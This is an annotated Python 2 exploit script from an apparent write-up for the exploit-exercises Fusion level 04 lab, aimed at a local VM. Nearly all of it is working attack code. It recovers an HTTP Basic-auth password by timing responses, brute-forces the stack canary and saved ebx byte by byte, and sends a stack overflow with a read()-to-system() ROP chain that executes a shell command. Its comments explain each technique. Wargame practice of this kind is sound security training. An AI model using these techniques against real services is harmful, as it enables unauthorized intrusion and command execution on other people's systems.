[exploit-exercises] Fusion level 04
tunz
2013. 7. 12. 11:52
"""Walkthrough script for exploit-exercises Fusion level 04 (Python 2).

The script has four stages.  The first three were run once and are kept
here as triple-quoted string blocks (dead code, not comments), with the
value each one recovered hard-coded right after the block:

1. recover the HTTP Basic-auth password, one character at a time;
2. recover the stack canary, one byte at a time;
3. recover the saved ebx, one byte at a time;
4. send the final request: overflow, then a read() -> system() ROP chain.

Every stage opens its own connection to 192.168.197.130:20004.
Python 2 only: `print` statements, `raw_input`, list-returning `range`
and `base64.encodestring` are all used.
"""
from socket import *
import time
import base64
from struct import *

# Both bases are rebased from addresses the author read out of the target's
# stack-smashing report (see the original trailing notes).  The constant
# offsets are specific to this level's binary and libc build.
base_addr = 0xb782970d - 0x170d # get from stack smashing information
libc_base = 0xb7698113 - 0xf3 - 0x19020 # get from stack smashing information
read = base_addr + 0xd20        # read() entry inside the target binary
system = libc_base + 0x3cb20    # system() in the target's libc
pppr = base_addr + 0x19ba       # presumably a pop;pop;pop;ret gadget -- it is
                                # used below to discard read()'s three args
bss = base_addr + 0x4240 + 0x300  # writable scratch area: the command is read here

# password check
# Stage 1 (already run; result hard-coded below).  For each of the 16
# positions it tries [0-9a-zA-Z], opens a fresh connection, sends the
# candidate prefix as the Basic-auth value and times the round trip; a
# reply faster than 2 ms is taken to mean the candidate character is right.
# The signal is presumably a timing difference in the server's password
# comparison (not shown here); a constant-time compare would remove it.
# Note that the trailing "\n" encodestring() appends is not stripped in this
# stage -- the input is short, so the value is a single base64 line.
"""
lists = range(ord('0'),ord('9')+1) + range(ord('a'),ord('z')+1) + range(ord('A'),ord('Z')+1)
j=0
password = ""
while j<16:
    for i in lists:
        print password+chr(i)
        s = socket(AF_INET, SOCK_STREAM)
        s.connect(('192.168.197.130',20004))
        s_time = time.time()
        s.send("GET / HTTP/1.0\r\nAuthorization: Basic "+base64.encodestring(password+chr(i))+"\r\n\r\n")
        s.recv(1024)
        e_time = time.time()
        if (e_time - s_time) < 0.002:
            password += chr(i)
            break
    j=j+1
"""
password = "bdRT5ifONhSSbXUy"
print "Password is "+password

# canary check
# Stage 2 (already run; result hard-coded below).  The value is the valid
# password followed by 2032 filler bytes, so the next byte written lands on
# the canary; the bytes recovered so far are appended, then one guess.  A
# guess is kept when the reply does not carry the "stack smashing" message.
# Byte-at-a-time recovery only works because every attempt is a new
# connection and the canary is assumed to be identical across connections
# (earlier bytes are reused); a canary that changes per connection defeats it.
# encodestring() wraps long input at 76 columns, so its newlines are removed
# to keep the header on one line.
"""
lists = range(0,0x100)
j=0
canary = ""
while j<4:
    for i in lists:
        print hex(i)
        s = socket(AF_INET, SOCK_STREAM)
        s.connect(('192.168.197.130',20004))
        s_time = time.time()
        payload = password
        payload += "A"*(2032)
        payload += canary
        payload += chr(i)
        payload = base64.encodestring(payload).replace("\n","")
        s.send("GET / HTTP/1.0\r\nAuthorization: Basic "+payload+"\r\n\r\n")
        data = s.recv(1024)
        e_time = time.time()
        if "stack smashing" not in data:
            canary += chr(i)
            break
    j=j+1
print "canary: "+hex(unpack('<L',canary)[0])
"""
canary = pack('<L',0x36c9bf00)  # little-endian; low byte is 0x00

#ebx check
# Stage 3 (already run; result hard-coded below).  Same overflow; the saved
# ebx sits 12 bytes past the canary.  A guess is kept when the service still
# answers "HTTP/1.0 200 Ok".  The bare `except:` around recv() swallows every
# error (including KeyboardInterrupt) and treats it as an empty reply.  Why
# ebx has to survive is not shown here -- presumably the return path needs
# the original value.
"""
lists = range(0,0x100)
j=0
ebx = ""
while j<4:
    for i in lists:
        print hex(i)
        s = socket(AF_INET, SOCK_STREAM)
        s.connect(('192.168.197.130',20004))
        payload = password
        payload += "A"*(2032)
        payload += canary
        payload += "A"*12
        payload += ebx+chr(i)
        payload = base64.encodestring(payload).replace("\n","")
        s.send("GET / HTTP/1.0\r\nAuthorization: Basic "+payload+"\r\n\r\n")
        try:
            data = s.recv(1024)
        except:
            data = ""
        if "HTTP/1.0 200 Ok" in data:
            ebx += chr(i)
            break
    j=j+1
print "ebx: "+hex(unpack('<L',ebx)[0])
"""
ebx = pack('<L',0xb782c118)

# Stage 4: the final request.  No timeout is set on the socket, so every
# recv() below blocks indefinitely if the server never answers.
s = socket(AF_INET, SOCK_STREAM)
s.connect(('192.168.197.130',20004))
raw_input('go?')  # pause until the operator presses Enter
# The request line goes first; the header carrying the overflow follows
# separately.  The request is never terminated with a blank line -- the
# overflow presumably takes effect while the header is being parsed.
s.send("GET / HTTP/1.0\r\n")
cmd = "id\x00"  # NUL-terminated so system() sees exactly "id"
# Frame layout inside the Basic-auth value: password, 2032 filler, canary,
# 12 filler, saved ebx, 12 filler, then the saved return address.
payload = password
payload += "A"*(2032)
payload += canary
payload += "A"*12
payload += ebx
payload += "A"*12
# ROP chain:
#   read(0, bss, len(cmd))  -- returns into pppr, which pops the three args
#   system(bss)             -- "AAAA" is system()'s (never used) return address
# Reading from fd 0 only receives `cmd` if this connection is the target
# process's stdin -- TODO confirm against the level's service.
payload += pack('<L',read)
payload += pack('<L',pppr)
payload += pack('<L',0)
payload += pack('<L',bss)
payload += pack('<L',len(cmd))
payload += pack('<L',system)
payload += "AAAA"
payload += pack('<L',bss)
payload = base64.encodestring(payload).replace("\n","")  # strip 76-col wrapping
s.send("Authorization: Basic "+payload+"\r\n")
time.sleep(0.5)  # let the server reach read() before the command is sent
s.send(cmd)
time.sleep(0.5)  # let system() produce output before reading the reply
print s.recv(1024)
s.close()